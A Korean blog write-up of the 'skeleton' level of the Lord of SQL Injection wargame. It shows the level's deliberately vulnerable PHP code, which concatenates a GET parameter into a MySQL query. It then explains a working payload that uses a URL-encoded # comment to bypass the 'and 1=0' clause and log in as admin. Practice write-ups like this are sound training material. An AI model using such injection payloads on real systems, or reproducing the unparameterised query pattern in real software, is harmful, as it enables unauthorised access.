<코드 분석>
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id'] == 'admin') solve("skeleton");
highlight_file(__FILE__);
?>pw 를 Get 방식으로 받아주고, prob _ . () 를 필터링한다.
그리고 id 가 admin이면 문제가 풀린다.
그런데, query 뒷부분에, and 1=0 이라는 false 구문이 들어있다. 해결해야 할 문제다.
<해설>
and 1=0은 한줄 주석으로 처리해주면 된다. # 을 이용하자. # 뒤의 모든 것들은 주석으로 처리된다.
넣어줄때 url-encoding 하는거 잊지말자.
?pw=' or id='admin' %23
Clear!
'WriteUp > LOS_rubiya' 카테고리의 다른 글
| LOS -rubiya : revenant (0) | 2020.05.14 |
|---|---|
| LOS -rubiya : Yeti (0) | 2020.05.14 |
| LOS -rubiya : Vampire (0) | 2020.05.13 |
| LOS -rubiya : Troll (0) | 2020.05.13 |
| LOS - rubiya : Orge (0) | 2020.05.13 |